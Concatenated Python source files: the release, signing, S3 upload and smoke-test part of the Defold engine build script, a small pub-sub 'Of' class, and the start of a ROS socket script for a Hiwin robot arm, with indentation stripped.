zip_path = join(self.defold_root, 'editor', 'target', 'editor', zip_file)
dmg_path = join(self.defold_root, 'editor', 'target', 'editor', dmg_file)
if os.path.exists(zip_path): self.upload_to_archive(zip_path, '%s/%s' % (full_archive_path, zip_file))
if os.path.exists(dmg_path): self.upload_to_archive(dmg_path, '%s/%s' % (full_archive_path, dmg_file))
self.wait_uploads()
def run_editor_script(self, cmd):
cwd = join(self.defold_root, 'editor')
run.env_command(self._form_env(), cmd, cwd = cwd)
def build_editor2(self):
cmd = ['python', './scripts/bundle.py',
'--engine-artifacts=%s' % self.engine_artifacts,
'--archive-domain=%s' % self.archive_domain,
'build']
if self.skip_tests:
cmd.append("--skip-tests")
self.run_editor_script(cmd)
def bundle_editor2(self):
if not self.channel:
raise Exception('No channel provided when bundling the editor')
cmd = ['python', './scripts/bundle.py',
'--platform=%s' % self.target_platform,
'--version=%s' % self.version,
'--channel=%s' % self.channel,
'--engine-artifacts=%s' % self.engine_artifacts,
'--archive-domain=%s' % self.archive_domain,
'bundle']
self.run_editor_script(cmd)
def sign_editor2(self):
editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor')
cmd = ['python', './scripts/bundle.py',
'--platform=%s' % self.target_platform,
'--bundle-dir=%s' % editor_bundle_dir,
'--archive-domain=%s' % self.archive_domain,
'sign']
if self.skip_codesign:
cmd.append('--skip-codesign')
else:
if self.windows_cert:
cmd.append('--windows-cert=%s' % self.windows_cert)
if self.windows_cert_pass:
cmd.append("--windows-cert-pass=%s" % self.windows_cert_pass)
if self.codesigning_identity:
cmd.append('--codesigning-identity="%s"' % self.codesigning_identity)
self.run_editor_script(cmd)
def notarize_editor2(self):
if self.target_platform != "x86_64-darwin":
return
editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor')
# create dmg installer
cmd = ['./scripts/bundle.py',
'--platform=x86_64-darwin',
'--bundle-dir=%s' % editor_bundle_dir,
'--archive-domain=%s' % self.archive_domain,
'installer']
if self.skip_codesign:
cmd.append('--skip-codesign')
else:
if self.codesigning_identity:
cmd.append('--codesigning-identity="%s"' % self.codesigning_identity)
self.run_editor_script(cmd)
# notarize dmg
editor_dmg = join(editor_bundle_dir, 'Defold-x86_64-darwin.dmg')
cmd = ['./scripts/notarize.py',
editor_dmg,
self.notarization_username,
self.notarization_password,
self.notarization_itc_provider]
self.run_editor_script(cmd)
#
# END: EDITOR 2
# ------------------------------------------------------------
def bump(self):
sha1 = self._git_sha1()
with open('VERSION', 'r') as f:
current = f.readlines()[0].strip()
if self.set_version:
new_version = self.set_version
else:
lst = map(int, current.split('.'))
lst[-1] += 1
new_version = '.'.join(map(str, lst))
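# e.g. '1.2.184' becomes '1.2.185' here when no explicit --set-version was given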
with open('VERSION', 'w') as f:
f.write(new_version)
print 'Bumping engine version from %s to %s' % (current, new_version)
print 'Review changes and commit'
def save_env(self):
if not self.save_env_path:
self._log("No --save-env-path set when trying to save environment export")
return
env = self._form_env()
res = ""
for key in env:
if bool(re.match('^[a-zA-Z0-9_]+$', key)):
res = res + ("export %s='%s'\n" % (key, env[key]))
with open(self.save_env_path, "w") as f:
f.write(res)
def shell(self):
print 'Setting up shell with DYNAMO_HOME, PATH, ANDROID_HOME and LD_LIBRARY_PATH/DYLD_LIBRARY_PATH (where applicable) set'
if "win32" in self.host:
preexec_fn = None
else:
preexec_fn = self.check_ems
process = subprocess.Popen([SHELL, '-l'], env = self._form_env(), preexec_fn=preexec_fn)
output = process.communicate()[0]
if process.returncode != 0:
self._log(output)
sys.exit(process.returncode)
# ------------------------------------------------------------
# BEGIN: RELEASE
#
def _get_tag_name(self, version, channel):
if channel and channel != 'stable':
channel = '-' + channel
else:
channel = ''
suffix = build_private.get_tag_suffix() # E.g. '' or 'switch'
if suffix:
suffix = '-' + suffix
return '%s%s%s' % (version, channel, suffix)
def create_tag(self):
if self.channel is None:
self._log("No channel specified!")
sys.exit(1)
is_stable = self.channel == 'stable'
channel = '' if is_stable else self.channel
msg = 'Release %s%s%s' % (self.version, '' if is_stable else ' - ', channel)
tag_name = self._get_tag_name(self.version, self.channel)
cmd = 'git tag -f -a %s -m "%s"' % (tag_name, msg)
# E.g.
# git tag -f -a 1.2.184 -m "Release 1.2.184" <- stable
# git tag -f -a 1.2.184-alpha -m "Release 1.2.184 - alpha"
run.shell_command(cmd)
return tag_name
def push_tag(self, tag):
cmd = 'git push -f origin %s' % tag
run.shell_command(cmd)
def _release_web_pages(self, releases):
model = {'releases': releases,
'has_releases': True}
model['release'] = { 'channel': "Unknown", 'version': self.version }
if self.channel:
model['release']['channel'] = self.channel.capitalize()
# We handle the stable channel separately, since we want it to point
# to the editor-dev release (which uses the latest stable engine).
editor_channel = None
if self.channel == "stable":
editor_channel = "editor-alpha"
else:
editor_channel = self.channel or "stable"
u = urlparse.urlparse(self.get_archive_path())
hostname = u.hostname
bucket = s3.get_bucket(hostname)
editor_archive_path = urlparse.urlparse(self.get_archive_path(editor_channel)).path
release_sha1 = releases[0]['sha1']
editor_download_url = "https://%s%s/%s/%s/editor2/" % (hostname, editor_archive_path, release_sha1, editor_channel)
model['release'] = {'editor': [ dict(name='macOS 10.11+', url=editor_download_url + 'Defold-x86_64-darwin.dmg'),
dict(name='macOS 10.7-10.10', url=editor_download_url + 'Defold-x86_64-darwin.zip'),
dict(name='Windows', url=editor_download_url + 'Defold-x86_64-win32.zip'),
dict(name='Ubuntu 16.04+', url=editor_download_url + 'Defold-x86_64-linux.zip')] }
page = None
with open(os.path.join("scripts", "resources", "downloads.html"), 'r') as file:
page = file.read()
# NOTE: We upload index.html to /CHANNEL/index.html
# The root-index, /index.html, redirects to /stable/index.html
self._log('Uploading %s/index.html' % self.channel)
html = page % {'model': json.dumps(model)}
key = bucket.new_key('%s/index.html' % self.channel)
key.content_type = 'text/html'
key.set_contents_from_string(html)
self._log('Uploading %s/info.json' % self.channel)
key = bucket.new_key('%s/info.json' % self.channel)
key.content_type = 'application/json'
key.set_contents_from_string(json.dumps({'version': self.version,
'sha1' : release_sha1}))
# Editor update-v3.json
key_v3 = bucket.new_key('editor2/channels/%s/update-v3.json' % self.channel)
key_v3.content_type = 'application/json'
self._log("Updating channel '%s' for update-v3.json: %s" % (self.channel, key_v3))
key_v3.set_contents_from_string(json.dumps({'sha1': release_sha1}))
# Set redirect urls so the editor can always be downloaded without knowing the latest sha1.
# Used by www.defold.com/download
# For example;
# redirect: /editor2/channels/editor-alpha/Defold-x86_64-darwin.dmg -> /archive/<sha1>/editor-alpha/Defold-x86_64-darwin.dmg
for name in ['Defold-x86_64-darwin.dmg', 'Defold-x86_64-win32.zip', 'Defold-x86_64-linux.zip']:
key_name = 'editor2/channels/%s/%s' % (editor_channel, name)
redirect = '%s/%s/%s/editor2/%s' % (editor_archive_path, release_sha1, editor_channel, name)
self._log('Creating link from %s -> %s' % (key_name, redirect))
key = bucket.new_key(key_name)
key.set_redirect(redirect)
def release(self):
""" This step creates a tag using the channel name
* It will update the webpage on d.defold.com (or DM_ARCHIVE_PATH)
* It will update the releases in the target repository
"""
if self.channel is None:
self._log("No channel specified!")
sys.exit(0)
if run.shell_command('git config -l').find('remote.origin.url') != -1 and os.environ.get('GITHUB_WORKFLOW', None) is None:
# NOTE: Only run fetch when we have a configured remote branch.
# When running on buildbot we don't but fetching should not be required either
# as we're already up-to-date
self._log('Running git fetch to get latest tags and refs...')
run.shell_command('git fetch')
# Create or update the tag for engine releases
tag_name = None
if self.channel in ('stable', 'beta', 'alpha'):
tag_name = self.create_tag()
self.push_tag(tag_name)
if tag_name is not None:
# NOTE: Each of the main branches has a channel (stable, beta and alpha)
# and each of them have their separate tag patterns ("1.2.183" vs "1.2.183-beta"/"1.2.183-alpha")
channel_pattern = ''
if self.channel != 'stable':
channel_pattern = '-' + self.channel
platform_pattern = build_private.get_tag_suffix() # E.g. '' or 'switch'
if platform_pattern:
platform_pattern = '-' + platform_pattern
# Example tags:
# 1.2.184, 1.2.184-alpha, 1.2.184-beta
# 1.2.184-switch, 1.2.184-alpha-switch, 1.2.184-beta-switch
pattern = r"(\d+\.\d+\.\d+%s)$" % (channel_pattern + platform_pattern)
releases = s3.get_tagged_releases(self.get_archive_path(), pattern)
else:
# e.g. editor-dev releases
releases = [s3.get_single_release(self.get_archive_path(), self.version, self._git_sha1())]
if not releases:
self._log('Unable to find any releases')
sys.exit(1)
release_sha1 = releases[0]['sha1']
if sys.stdin.isatty():
sys.stdout.write('Release %s with SHA1 %s to channel %s? [y/n]: ' % (self.version, release_sha1, self.channel))
response = sys.stdin.readline()
if response[0] != 'y':
return
# Only release the web pages for the public repo
if not build_private.is_repo_private():
self._release_web_pages(releases)
# Release to github as well
if tag_name:
# only allowed anyways with a github token
release_to_github.release(self, tag_name, release_sha1, releases[0])
#
# END: RELEASE
# ------------------------------------------------------------
def release_to_github(self):
tag_name = self._get_tag_name(self.version, self.channel)
release_sha1 = self._git_sha1(self.version)
releases = [s3.get_single_release(self.get_archive_path(''), self.version, release_sha1)]
#Hack since the no-channel bucket is the one containing both bob and editors
channel = self.channel
self.channel = ''
release_to_github.release(self, tag_name, release_sha1, releases[0])
self.channel = channel
def sync_archive(self):
u = urlparse.urlparse(self.get_archive_path())
bucket_name = u.hostname
bucket = s3.get_bucket(bucket_name)
local_dir = os.path.join(self.dynamo_home, 'archive')
self._mkdirs(local_dir)
if not self.thread_pool:
self.thread_pool = ThreadPool(8)
def download(key, path):
self._log('s3://%s/%s -> %s' % (bucket_name, key.name, path))
key.get_contents_to_filename(path)
futures = []
sha1 = self._git_sha1()
# Only s3 is supported (scp is deprecated)
# The pattern is used to filter out:
# * Editor files
# * Defold SDK files
# * launcher files, used to launch editor2
pattern = re.compile(r'(^|/)editor(2)*/|/defoldsdk\.zip$|/launcher(\.exe)*$')
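# For example, keys ending in '/defoldsdk.zip' or '/launcher'/'/launcher.exe', or containing an
# 'editor/' or 'editor2/' segment, match the pattern above and are skipped.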
prefix = s3.get_archive_prefix(self.get_archive_path(), self._git_sha1())
for key in bucket.list(prefix = prefix):
rel = os.path.relpath(key.name, prefix)
if not pattern.search(rel):
p = os.path.join(local_dir, sha1, rel)
self._mkdirs(os.path.dirname(p))
f = Future(self.thread_pool, download, key, p)
futures.append(f)
for f in futures:
f()
# ------------------------------------------------------------
# BEGIN: SMOKE TEST
#
def _download_editor2(self, channel, sha1):
bundles = {
'x86_64-darwin': 'Defold-x86_64-darwin.dmg',
'x86_64-linux' : 'Defold-x86_64-linux.zip',
'x86_64-win32' : 'Defold-x86_64-win32.zip'
}
host2 = get_host_platform2()
bundle = bundles.get(host2)
if bundle:
url = join(self.get_archive_path(), sha1, channel, 'editor2', bundle).replace("s3", "https").replace("\\", "/")
path = self._download(url)
return path
else:
print("No editor2 bundle found for %s" % host2)
return None
def _install_editor2(self, path):
host2 = get_host_platform2()
install_path = join('tmp', 'smoke_test')
if 'darwin' in host2:
out = run.command(['hdiutil', 'attach', path])
print("cmd:" + out)
last = [l2 for l2 in (l1.strip() for l1 in out.split('\n')) if l2][-1]
words = last.split()
fs = words[0]
volume = words[-1]
install_path = join(install_path, 'Defold.app')
self._copy_tree(join(volume, 'Defold.app'), install_path)
result = {'volume': volume,
'fs': fs,
'install_path': install_path,
'resources_path': join('Defold.app', 'Contents', 'Resources'),
'config': join(install_path, 'Contents', 'Resources', 'config')}
return result
else:
if 'win32' in host2 or 'linux' in host2:
self._extract_zip(path, install_path)
else:
self._extract(path, install_path)
install_path = join(install_path, 'Defold')
result = {'install_path': install_path,
'resources_path': 'Defold',
'config': join(install_path, 'config')}
return result
def _uninstall_editor2(self, info):
host2 = get_host_platform2()
shutil.rmtree(info['install_path'])
if 'darwin' in host2:
out = run.command(['hdiutil', 'detach', info['fs']])
def _get_config(self, config, section, option, overrides):
combined = '%s.%s' % (section, option)
if combined in overrides:
return overrides[combined]
if section == 'bootstrap' and option == 'resourcespath':
return '.'
v = config.get(section, option)
m = re.search(r"\${(\w+).(\w+)}", v)
while m:
s = m.group(1)
o = m.group(2)
v = re.sub(r"\${(\w+).(\w+)}", self._get_config(config, s, o, overrides), v, 1)
m = re.search(r"\${(\w+).(\w+)}", v)
return v
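# For example, a value containing '${bootstrap.resourcespath}' is expanded by the loop above,
# preferring entries in the overrides dict over values read from the parsed config file.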
def smoke_test(self):
sha1 = self._git_sha1()
cwd = join('tmp', 'smoke_test')
if os.path.exists(cwd):
shutil.rmtree(cwd)
path = self._download_editor2(self.channel, sha1)
info = self._install_editor2(path)
config = ConfigParser()
config.read(info['config'])
overrides = {'bootstrap.resourcespath': info['resources_path']}
jdk = 'jdk11.0.1-p1'
host2 = get_host_platform2()
if 'win32' in host2:
java = join('Defold', 'packages', jdk, 'bin', 'java.exe')
elif 'linux' in host2:
run.command(['chmod', '-R', '755', 'tmp/smoke_test/Defold'])
java = join('Defold', 'packages', jdk, 'bin', 'java')
else:
java = join('Defold.app', 'Contents', 'Resources', 'packages', jdk, 'bin', 'java')
jar = self._get_config(config, 'launcher', 'jar', overrides)
vmargs = self._get_config(config, 'launcher', 'vmargs', overrides).split(',') + ['-Ddefold.log.dir=.', '-Ddefold.smoke.log=true']
vmargs = filter(lambda x: not str.startswith(x, '-Ddefold.update.url='), vmargs)
main = self._get_config(config, 'launcher', 'main', overrides)
game_project = '../../editor/test/resources/geometry_wars/game.project'
args = [java, '-cp', jar] + vmargs + [main, '--preferences=../../editor/test/resources/smoke_test_prefs.json', game_project]
robot_jar = '%s/ext/share/java/defold-robot.jar' % self.dynamo_home
robot_args = [java, '-jar', robot_jar, '-s', '../../share/smoke-test.edn', '-o', 'result']
origdir = os.getcwd()
origcwd = cwd
if 'win32' in host2:
os.chdir(cwd)
cwd = '.'
print('Running robot: %s' % robot_args)
robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False)
time.sleep(2)
self._log('Running editor: %s' % args)
ed_proc = subprocess.Popen(args, cwd = cwd, shell = False)
os.chdir(origdir)
cwd = origcwd
output = robot_proc.communicate()[0]
if ed_proc.poll() is None:
ed_proc.terminate()
ed_proc.wait()
self._uninstall_editor2(info)
result_archive_path = '/'.join(['int.d.defold.com', 'archive', sha1, self.channel, 'editor2', 'smoke_test'])
def _findwebfiles(libdir):
paths = os.listdir(libdir)
paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.html', '.css', '.png')]
return paths
for f in _findwebfiles(join(cwd, 'result')):
self.upload_to_s3(f, 's3://%s/%s' % (result_archive_path, basename(f)))
self.wait_uploads()
self._log('Log: https://s3-eu-west-1.amazonaws.com/%s/index.html' % (result_archive_path))
if robot_proc.returncode != 0:
sys.exit(robot_proc.returncode)
return True
def local_smoke(self):
host2 = get_host_platform2()
cwd = './editor'
if os.path.exists('editor/log.txt'):
os.remove('editor/log.txt')
game_project = 'test/resources/geometry_wars/game.project'
args = ['./scripts/lein', 'with-profile', '+smoke-test', 'run', game_project]
robot_jar = '../defold-robot/target/defold-robot-0.7.0-standalone.jar'
robot_args = ['java', '-jar', robot_jar, '-s', '../share/smoke-test.edn', '-o', 'local_smoke_result']
origdir = os.getcwd()
origcwd = cwd
if 'win32' in host2:
os.chdir(cwd)
args = ['sh'] + args
cwd = '.'
print('Running robot: %s' % robot_args)
robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False)
time.sleep(2)
self._log('Running editor: %s' % args)
ed_proc = subprocess.Popen(args, cwd = cwd, shell = False)
os.chdir(origdir)
cwd = origcwd
output = robot_proc.communicate()[0]
if ed_proc.poll() is None:
ed_proc.terminate()
ed_proc.wait()
if robot_proc.returncode != 0:
sys.exit(robot_proc.returncode)
return True
#
# END: SMOKE TEST
# ------------------------------------------------------------
def get_archive_path(self, channel=None):
if channel is None:
channel = self.channel
assert(type(channel) == str)
return join(self.archive_path, channel)
def get_archive_redirect_key(self, url):
old_url = url.replace(self.get_archive_path().replace("\\", "/"), self.archive_path)
u = urlparse.urlparse(old_url)
return u.path
def download_from_archive(self, src_path, dst_file):
url = join(self.get_archive_path(), src_path)
self.download_from_s3(dst_file, url)
def upload_to_archive(self, src_file, dst_path):
url = join(self.get_archive_path(), dst_path).replace("\\", "/")
self._log("Uploading %s -> %s" % (src_file, url))
self.upload_to_s3(src_file, url)
# create redirect so that the old s3 paths still work
# s3://d.defold.com/archive/channel/sha1/engine/* -> http://d.defold.com/archive/sha1/engine/*
bucket = s3.get_bucket(urlparse.urlparse(url).netloc)
redirect_key = self.get_archive_redirect_key(url)
redirect_url = url.replace("s3://", "http://")
key = bucket.new_key(redirect_key)
key.set_redirect(redirect_url)
self._log("Redirecting %s -> %s : %s" % (url, redirect_key, redirect_url))
def download_from_s3(self, path, url):
url = url.replace('\\', '/')
self._log('Downloading %s -> %s' % (url, path))
u = urlparse.urlparse(url)
if u.scheme == 's3':
self._mkdirs(os.path.dirname(path))
from boto.s3.key import Key
bucket = s3.get_bucket(u.netloc)
k = Key(bucket)
k.key = u.path
k.get_contents_to_filename(path)
self._log('Downloaded %s -> %s' % (url, path))
else:
raise Exception('Unsupported url %s' % (url))
def upload_to_s3(self, path, url):
url = url.replace('\\', '/')
self._log('Uploading %s -> %s' % (path, url))
u = urlparse.urlparse(url)
if u.scheme == 's3':
bucket = s3.get_bucket(u.netloc)
if not self.thread_pool:
self.thread_pool = ThreadPool(8)
p = u.path
if p[-1] == '/':
p += basename(path)
def upload_singlefile():
key = bucket.new_key(p)
key.set_contents_from_filename(path)
self._log('Uploaded %s -> %s' % (path, url))
def upload_multipart():
headers = {}
contenttype, _ = mimetypes.guess_type(path)
if contenttype is not None:
headers['Content-Type'] = contenttype
mp = bucket.initiate_multipart_upload(p, headers=headers)
source_size = os.stat(path).st_size
chunksize = 64 * 1024 * 1024 # 64 MiB
chunkcount = int(math.ceil(source_size / float(chunksize)))
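# e.g. a 200 MiB file yields chunkcount == 4: three full 64 MiB parts plus one 8 MiB remainder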
def upload_part(filepath, part, offset, size):
with open(filepath, 'r') as fhandle:
fhandle.seek(offset)
mp.upload_part_from_file(fp=fhandle, part_num=part, size=size)
_threads = []
for i in range(chunkcount):
part = i + 1
offset = i * chunksize
remaining = source_size - offset
size = min(chunksize, remaining)
args = {'filepath': path, 'part': part, 'offset': offset, 'size': size}
self._log('Uploading #%d %s -> %s' % (i + 1, path, url))
_thread = Thread(target=upload_part, kwargs=args)
_threads.append(_thread)
_thread.start()
for i in range(chunkcount):
_threads[i].join()
self._log('Uploaded #%d %s -> %s' % (i + 1, path, url))
if len(mp.get_all_parts()) == chunkcount:
mp.complete_upload()
self._log('Uploaded %s -> %s' % (path, url))
else:
mp.cancel_upload()
self._log('Failed to upload %s -> %s' % (path, url))
f = None
if sys.platform == 'win32':
f = Future(self.thread_pool, upload_singlefile)
else:
f = Future(self.thread_pool, upload_multipart)
self.futures.append(f)
else:
raise Exception('Unsupported url %s' % (url))
def wait_uploads(self):
for f in self.futures:
f()
self.futures = []
def _form_env(self):
env = dict(os.environ)
host = self.host2
if 'x86-' in host:
host = self.host
ld_library_path = 'DYLD_LIBRARY_PATH' if self.host == 'darwin' else 'LD_LIBRARY_PATH'
ld_library_paths = ['%s/lib/%s' % (self.dynamo_home, self.target_platform),
'%s/ext/lib/%s' % (self.dynamo_home, self.host)]
if self.host == 'x86_64-linux':
ld_library_paths.append('%s/ext/SDKs/linux/%s/%s/lib' % (self.dynamo_home, PACKAGES_LINUX_CLANG, PACKAGES_TAPI_VERSION))
env[ld_library_path] = os.path.pathsep.join(ld_library_paths)
pythonpaths = ['%s/lib/python' % self.dynamo_home,
'%s/build_tools' % self.defold,
'%s/ext/lib/python' % self.dynamo_home]
env['PYTHONPATH'] = os.path.pathsep.join(pythonpaths)
env['DYNAMO_HOME'] = self.dynamo_home
env['ANDROID_HOME'] = os.path.join(self.dynamo_home, 'ext', 'SDKs', 'android-sdk')
go_root = '%s/ext/go/%s/go' % (self.dynamo_home, self.target_platform)
android_host = self.host
if 'win32' in android_host:
android_host = 'windows'
paths = os.path.pathsep.join(['%s/bin/%s' % (self.dynamo_home, self.target_platform),
'%s/bin' % (self.dynamo_home),
'%s/ext/bin' % self.dynamo_home,
'%s/ext/bin/%s' % (self.dynamo_home, host),
'%s/bin' % go_root,
'%s/platform-tools' % env['ANDROID_HOME'],
'%s/ext/SDKs/%s/toolchains/llvm/prebuilt/%s-x86_64/bin' % (self.dynamo_home,PACKAGES_ANDROID_NDK,android_host)])
env['PATH'] = paths + os.path.pathsep + env['PATH']
go_paths = os.path.pathsep.join(['%s/go' % self.dynamo_home,
join(self.defold, 'go')])
env['GOPATH'] = go_paths
env['GOROOT'] = go_root
env['MAVEN_OPTS'] = '-Xms256m -Xmx700m -XX:MaxPermSize=1024m'
# Force 32-bit python 2.7 on darwin.
env['VERSIONER_PYTHON_PREFER_32_BIT'] = 'yes'
env['VERSIONER_PYTHON_VERSION'] = '2.7'
if self.no_colors:
env['NOCOLOR'] = '1'
env['EMSCRIPTEN'] = self._form_ems_path()
env['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache')
env['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten')
xhr2_path = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR, 'xhr2', 'package', 'lib')
if 'NODE_PATH' in env:
env['NODE_PATH'] = xhr2_path + os.path.pathsep + env['NODE_PATH']
else:
env['NODE_PATH'] = xhr2_path
return env
if __name__ == '__main__':
boto_path = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../packages/boto-2.28.0-py2.7.whl'))
sys.path.insert(0, boto_path)
usage = '''usage: %prog [options] command(s)
Commands:
distclean - Removes the DYNAMO_HOME folder
install_ext - Install external packages
install_ems - Install emscripten sdk
sync_archive - Sync engine artifacts from S3
activate_ems - Used when changing to a branch that uses a different version of emscripten SDK (resets ~/.emscripten)
build_engine - Build engine
archive_engine - Archive engine (including builtins) to path specified with --archive-path
build_editor2 - Build editor
sign_editor2 - Sign editor
bundle_editor2 - Bundle editor (zip)
archive_editor2 - Archive editor to path specified with --archive-path
download_editor2 - Download editor bundle (zip)
notarize_editor2 - Notarize the macOS version of the editor
build_bob - Build bob with native libraries included for cross platform deployment
archive_bob - Archive bob to path specified with --archive-path
build_docs - Build documentation
build_builtins - Build builtin content archive
bump - Bump version number
release - Release editor
shell - Start development shell
smoke_test - Test editor and engine in combination
local_smoke - Test run smoke test using local dev environment
Multiple commands can be specified
To pass on arbitrary options to waf: build.py OPTIONS COMMANDS -- WAF_OPTIONS
'''
parser = optparse.OptionParser(usage)
parser.add_option('--platform', dest='target_platform',
default = None,
choices = get_target_platforms(),
help = 'Target platform')
parser.add_option('--skip-tests', dest='skip_tests',
action = 'store_true',
default = False,
help = 'Skip unit-tests. Default is false')
parser.add_option('--skip-codesign', dest='skip_codesign',
action = 'store_true',
default = False,
help = 'skip code signing (engine and editor). Default is false')
parser.add_option('--skip-docs', dest='skip_docs',
action = 'store_true',
default = False,
help = 'skip building docs when building the engine. Default is false')
parser.add_option('--skip-builtins', dest='skip_builtins',
action = 'store_true',
default = False,
help = 'skip building builtins when building the engine. Default is false')
parser.add_option('--skip-bob-light', dest='skip_bob_light',
action = 'store_true',
default = False,
help = 'skip building bob-light when building the engine. Default is false')
parser.add_option('--disable-ccache', dest='disable_ccache',
action = 'store_true',
default = False,
help = 'force disable of ccache. Default is false')
parser.add_option('--no-colors', dest='no_colors',
action = 'store_true',
default = False,
help = 'No color output. Default is color output')
default_archive_domain = DEFAULT_ARCHIVE_DOMAIN
parser.add_option('--archive-domain', dest='archive_domain',
default = default_archive_domain,
help = 'Domain where builds will be archived. Default is %s' % default_archive_domain)
default_package_path = CDN_PACKAGES_URL
parser.add_option('--package-path', dest='package_path',
default = default_package_path,
help = 'Either a URL to a file server where the sdk packages are located, or a path to a local folder. Reads $DM_PACKAGES_URL. Default is %s.' % default_package_path)
parser.add_option('--set-version', dest='set_version',
default = None,
help = 'Set version explicitly when bumping version')
parser.add_option('--channel', dest='channel',
default = None,
help = 'Editor release channel (stable, beta, ...)')
parser.add_option('--engine-artifacts', dest='engine_artifacts',
default = 'auto',
help = 'What engine version to bundle the Editor with (auto, dynamo-home, archived, archived-stable or a SHA1)')
parser.add_option('--save-env-path', dest='save_env_path',
default = None,
help = 'Save environment variables to a file')
parser.add_option('--notarization-username', dest='notarization_username',
default = None,
help = 'Username to use when sending the editor for notarization')
parser.add_option('--notarization-password', dest='notarization_password',
default = None,
help = 'Password to use when sending the editor for notarization')
parser.add_option('--notarization-itc-provider', dest='notarization_itc_provider',
default = None,
help = 'Optional iTunes Connect provider to use when sending the editor for notarization')
parser.add_option('--github-token', dest='github_token',
default = None,
help = 'GitHub authentication token when releasing to GitHub')
github_release_target_repo = DEFAULT_RELEASE_REPOSITORY
parser.add_option('--github-target-repo', dest='github_target_repo',
default = github_release_target_repo,
help = 'GitHub target repo when releasing artefacts. Default is %s' % github_release_target_repo)
parser.add_option('--github-sha1', dest='github_sha1',
default = None,
help = 'A specific sha1 to use in github operations')
parser.add_option('--version', dest='version',
default = None,
help = 'Version to use instead of from VERSION file')
parser.add_option('--codesigning-identity', dest='codesigning_identity',
default = None,
help = 'Codesigning identity for macOS version of the editor')
parser.add_option('--windows-cert', dest='windows_cert',
default = None,
help = 'Path to codesigning certificate for Windows version of the editor')
parser.add_option('--windows-cert-pass', dest='windows_cert_pass',
default = None,
help = 'Path to file containing password to codesigning certificate for Windows version of the editor')
parser.add_option('--verbose', dest='verbose',
action = 'store_true',
default = False,
help = 'If used, outputs verbose logging')
options, all_args = parser.parse_args()
args = filter(lambda x: x[:2] != '--', all_args)
waf_options = filter(lambda x: x[:2] == '--', all_args)
if len(args) == 0:
parser.error('No command specified')
target_platform = options.target_platform
if not options.target_platform:
target_platform = get_host_platform2()
if 'x86-' in target_platform:
target_platform = get_host_platform() # we need even more cleanup to use "x86-linux" format for everything
c = Configuration(dynamo_home = os.environ.get('DYNAMO_HOME', None),
target_platform = target_platform,
skip_tests = options.skip_tests,
skip_codesign = options.skip_codesign,
skip_docs = options.skip_docs,
skip_builtins = options.skip_builtins,
skip_bob_light = options.skip_bob_light,
disable_ccache = options.disable_ccache,
no_colors = options.no_colors,
archive_domain = options.archive_domain,
package_path = options.package_path,
set_version = options.set_version,
channel = options.channel,
engine_artifacts = options.engine_artifacts,
waf_options = waf_options,
save_env_path = options.save_env_path,
notarization_username = options.notarization_username,
notarization_password = options.notarization_password,
notarization_itc_provider = options.notarization_itc_provider,
github_token = options.github_token,
github_target_repo = options.github_target_repo,
github_sha1 = options.github_sha1,
version = options.version,
codesigning_identity = options.codesigning_identity,
windows_cert = options.windows_cert,
windows_cert_pass = options.windows_cert_pass,
verbose = options.verbose)
for cmd in args:
f = getattr(c, cmd, None)
if not f:
parser.error('Unknown command %s' % cmd)
else:
start = time.time()
print("Running '%s'" % cmd)
f()
c.wait_uploads()
duration = (time.time() - start)
print("'%s' completed in %.2f s" % (cmd, duration))
print('Done')
|
ofsubject.py
|
#! /usr/bin/env python3
"""This module will define the Of functionality for pub-sub-python package
"""
__version__ = '1.0.0.1'
__author__ = 'Midhun C Nair <midhunch@gmail.com>'
__maintainers__ = [
'Midhun C Nair <midhunch@gmail.com>',
]
from threading import Thread
from uuid import uuid4
from time import sleep
from ps_py.subject import Subject
from ps_py.utils import (
get_unique_id,
)
class Of:
"""
"""
def __init__(self, *args, timeout=5):
"""
"""
self.id = str(uuid4())
self.int_id = get_unique_id(self.id)[0]
self.subject = Subject(self.int_id, initial_value=None)
self.args = args
self.index = -1
self.timeout = timeout
@property
def args(self):
"""
"""
return self._args
@args.setter
def args(self, value):
"""
"""
if (
isinstance(value, str)
or not hasattr(value, '__iter__')
):
raise ValueError("Expected an iterable value but got type '%s'" % type(value))
self._args = value
def subscribe(self, onSuccess, onError=None):
"""
"""
sub = self.subject.subscribe(onSuccess=onSuccess, onError=onError)
self.subscribers[sub.name] = sub
if self.index == -1:
self.run()
return sub
def run(self):
"""
"""
self.index = 0
def _run():
"""
"""
for item in self.args:
self.subject.next(item)
sleep(self.timeout)
thread = Thread(target=_run)
thread.daemon = True
thread.start()
# thread.join()
def pipe(self, *args):
"""
"""
return self.subject.pipe(*args)
@property
def subscribers(self):
"""
"""
try:
if not isinstance(self._subscribers, dict):
self._subscribers = {}
except AttributeError:
self._subscribers = {}
return self._subscribers
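# Illustrative usage (a minimal sketch, assuming the ps_py package above is importable):
#
#   values = Of(1, 2, 3, timeout=1)
#   values.subscribe(onSuccess=lambda v: print('got', v))
#
# Each argument is pushed to the backing Subject on a daemon thread, with
# `timeout` seconds of sleep between emissions.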
|
HiwinRA605_socket_ros_test_20190626103751.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and transmit them over a socket to the control-side computer
import socket
## Multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' # Initial value of the transmitted data
Arm_feedback = 1 # Assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # Initial value of the response counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
